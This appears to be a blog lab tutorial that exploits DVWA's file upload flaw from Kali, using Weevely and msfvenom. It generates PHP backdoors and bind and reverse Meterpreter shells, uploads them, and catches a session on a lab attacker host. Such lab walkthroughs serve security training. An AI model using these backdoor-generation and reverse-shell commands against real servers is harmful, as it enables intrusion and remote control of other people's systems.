Comments

Latest Posts

Using Kali to Exploit Basic File Upload Vulnerability Using PHP Web Shell

File upload vulnerability is a well known issue with online applications. If a web application has this type of vulnerability, a hacker can upload a file with malicious code in it that can be executed on the server.

In this lab, two different tools will be used to generate php web shell which will be upload to the victim server using vulnerable file upload function in their web page. 





    Pre-requisites

    Topology








    Requirements:

    Set DVWA Security level to low so we can exploit this basic file upload vulnerability.

    Upload file page: http://192.168.2.90/dvwa/vulnerabilities/upload/#

    Uploaded file path: /var/www/dvwa/hackable/uploads

    Weevely – Stealth tiny php web shell

    Weevely Package Description

    Weevely is a stealth PHP web shell that simulate telnet-like connection. It is an essential tool for web application post exploitation, and can be used as stealth backdoor or as a web shell to manage legit web accounts, even free hosted ones.

    Source: https://github.com/epinna/Weevely/
    Weevely Homepage | Kali Weevely Repo

    • Author: Weevely Developers
    • License: GPLv2

    Weevely help


    ┌──(root💀kali)-[~]
    └─# weevely -h                                                                                         2 ⨯
    usage: weevely [-h] {terminal,session,generate} ...
    
    positional arguments:
      {terminal,session,generate}
        terminal            Run terminal or command on the target
        session             Recover an existing session
        generate            Generate new agent
    
    optional arguments:
      -h, --help            show this help message and exit
                                                                                                               
    ┌──(root💀kali)-[~]
    └─# 
    
    

    weevely Usage Example

    Generate a PHP backdoor (generate) protected with the given password (Password1234).

    [email protected]:~# weevely generate Password1234 /kali/Desktop/shell.php
    [generate.php] Backdoor file 'shell.php' created with password 'Password1234'
    [email protected]:~# weevely http://192.168.2.202/dvwa/hackable/uploads/shell.php Password1234
          ________                     __
         |  |  |  |----.----.-.--.----'  |--.--.
         |  |  |  | -__| -__| |  | -__|  |  |  |
         |________|____|____|___/|____|__|___  | v1.1
                                         |_____|
                  Stealth tiny web shell

    [+] Browse filesystem, execute commands or list available modules with ':help'
    [+] Current session: 'sessions/192.168.2.202/weevely.session'

    [email protected]:/var/www $ uname
    Linux
    [email protected]:/var/www $ id
    uid=33(www-data) gid=33(www-data




    Msfvenom

    Msfvenom is the combination of payload generation and encoding. It replaced msfpayload and msfencode on June 8th 2015. It is a command line instance of Metasploit that is used to generate and output all of the various types of shell code that are available in Metasploit.

    From the Kali terminal type command msfvenom as shown below. It will show you all available options for creating a payload .
                                                                                 
    ┌──(kali㉿kali)-[~]
    └─$ msfvenom
    Error: No options
    MsfVenom - a Metasploit standalone payload generator.
    Also a replacement for msfpayload and msfencode.
    Usage: /usr/bin/msfvenom [options] <var=val>
    Example: /usr/bin/msfvenom -p windows/meterpreter/reverse_tcp LHOST=<IP> -f exe -o payload.exe
    
    Options:
        -l, --list            <type>     List all modules for [type]. Types are: payloads, encoders, nops, platforms, archs, encrypt, formats, all
        -p, --payload         <payload>  Payload to use (--list payloads to list, --list-options for arguments). Specify '-' or STDIN for custom
            --list-options               List --payload <value>'s standard, advanced and evasion options
        -f, --format          <format>   Output format (use --list formats to list)
        -e, --encoder         <encoder>  The encoder to use (use --list encoders to list)
            --service-name    <value>    The service name to use when generating a service binary
            --sec-name        <value>    The new section name to use when generating large Windows binaries. Default: random 4-character alpha string
            --smallest                   Generate the smallest possible payload using all available encoders
            --encrypt         <value>    The type of encryption or encoding to apply to the shellcode (use --list encrypt to list)
            --encrypt-key     <value>    A key to be used for --encrypt
            --encrypt-iv      <value>    An initialization vector for --encrypt
        -a, --arch            <arch>     The architecture to use for --payload and --encoders (use --list archs to list)
            --platform        <platform> The platform for --payload (use --list platforms to list)
        -o, --out             <path>     Save the payload to a file
        -b, --bad-chars       <list>     Characters to avoid example: '\x00\xff'
        -n, --nopsled         <length>   Prepend a nopsled of [length] size on to the payload
            --pad-nops                   Use nopsled size specified by -n <length> as the total payload size, auto-prepending a nopsled of quantity (nops minus payload length)
        -s, --space           <length>   The maximum size of the resulting payload
            --encoder-space   <length>   The maximum size of the encoded payload (defaults to the -s value)
        -i, --iterations      <count>    The number of times to encode the payload
        -c, --add-code        <path>     Specify an additional win32 shellcode file to include
        -x, --template        <path>     Specify a custom executable file to use as a template
        -k, --keep                       Preserve the --template behaviour and inject the payload as a new thread
        -v, --var-name        <value>    Specify a custom variable name to use for certain output formats
        -t, --timeout         <second>   The number of seconds to wait when reading the payload from STDIN (default 30, 0 to disable)
        -h, --help                       Show this message
                                                                                 
    


    Generate Shell using php/bind_php

    $ msfvenom -p php/bind_php --list-options
    $ msfvenom -p php/bind_php LPORT=4444 -o /home/kali/Desktop/php_bind.php


    ┌──(root💀kali)-[~]
    └─# msfvenom -p php/bind_php --list-options                                                            1 ⨯
    Options for payload/php/bind_php:
    =========================
    
    
           Name: PHP Command Shell, Bind TCP (via PHP)
         Module: payload/php/bind_php
       Platform: PHP
           Arch: php
    Needs Admin: No
     Total size: 2499
           Rank: Normal
    
    Provided by:
        egypt <[email protected]>
        diaul <[email protected]>
    
    Basic options:
    Name   Current Setting  Required  Description
    ----   ---------------  --------  -----------
    LPORT  4444             yes       The listen port
    RHOST                   no        The target address
    
    Description:
      Listen for a connection and spawn a command shell via php
    
    
    
    Advanced options for payload/php/bind_php:
    =========================
    
        Name                     Current Setting  Required  Description
        ----                     ---------------  --------  -----------
        AutoRunScript                             no        A script to run automatically on session creation
                                                            .
        AutoVerifySession        true             yes       Automatically verify and drop invalid sessions
        CommandShellCleanupComm                   no        A command to run before the session is closed
        and
        CreateSession            true             no        Create a new session for every successful login
        InitialAutoRunScript                      no        An initial script to run on session creation (bef
                                                            ore AutoRunScript)
        VERBOSE                  false            no        Enable detailed status messages
        WORKSPACE                                 no        Specify the workspace for this module
    
    Evasion options for payload/php/bind_php:
    =========================
    
        Name  Current Setting  Required  Description
        ----  ---------------  --------  -----------
                                                                                                               
    ┌──(root💀kali)-[~]
    └─# msfvenom -p php/bind_php LPORT=4444 -o /home/kali/Desktop/phpbind.php                                       
    [-] No platform was selected, choosing Msf::Module::Platform::PHP from the payload
    [-] No arch selected, selecting arch: php from the payload
    No encoder specified, outputting raw payload
    Payload size: 2501 bytes
    Saved as: phpbind.php
    
    

    noet: remove ‘/*’ from file.before uploading to DVWA

    Launch web browser to access page: http://192.168.2.90/dvwa//hackable/uploads/phpbind.php

    Execute it from Kali

    $ nc 192.168.2.90 4444


    Generate payload using php/meterpreter/reverse_tcp

    Here we are going to use Msfvenom to create a PHP payload (-p) and print the output of the payload in a raw format (-f).


    msfvenom -p php/meterpreter/reverse_tcp lhost=192.168.2.20 lport=8888 -f raw
    

    Here we are telling Msfvenom to create a PHP payload (-p) and print the output of the payload in a raw format (-f). The kali server 192.168.2.20 will be listening on port 8888 from the victim machine's connection which executed the php payload. 

    Copy the malicious PHP code and paste it into any text editor tool. Then save this text as “shell.php.”

    Once the PHP file is ready, we can upload it to the web server, but before uploading it, we should start a multi-handler to listen for the incoming connection.

                                                                                                                                                                                                                                              
    ┌──(kali㉿kali)-[~]
    └─$ msfconsole 
                                                      
                              ########                  #
                          #################            #
                       ######################         #
                      #########################      #
                    ############################
                   ##############################
                   ###############################
                  ###############################
                  ##############################
                                  #    ########   #
                     ##        ###        ####   ##
                                          ###   ###
                                        ####   ###
                   ####          ##########   ####
                   #######################   ####
                     ####################   ####
                      ##################  ####
                        ############      ##
                           ########        ###
                          #########        #####
                        ############      ######
                       ########      #########
                         #####       ########
                           ###       #########
                          ######    ############
                         #######################
                         #   #   ###  #   #   ##
                         ########################
                          ##     ##   ##     ##
                                https://metasploit.com
    
    
           =[ metasploit v6.0.43-dev                          ]
    + -- --=[ 2129 exploits - 1139 auxiliary - 363 post       ]
    + -- --=[ 592 payloads - 45 encoders - 10 nops            ]
    + -- --=[ 8 evasion                                       ]
    
    Metasploit tip: After running db_nmap, be sure to 
    check out the result of hosts and services
    
    msf6 > use exploit/multi/handler
    [*] Using configured payload generic/shell_reverse_tcp
    msf6 exploit(multi/handler) > set payload php/meterpreter/reverse_tcp
    payload => php/meterpreter/reverse_tcp
    msf6 exploit(multi/handler) > set lhost 192.168.2.20
    lhost => 192.168.2.20
    msf6 exploit(multi/handler) > set lport 8888
    lport => 8888
    msf6 exploit(multi/handler) > exploit
    
    [*] Started reverse TCP handler on 192.168.2.20:8888 
    
    
    
    Launch web browser to access http://192.168.2.90/dvwa//hackable/uploads/shell.php, which will generate a reverse connection to our Kali server 192.168.2.20. From Kali's output window, you will see a session has been created. 








    YouTube Video:


    No comments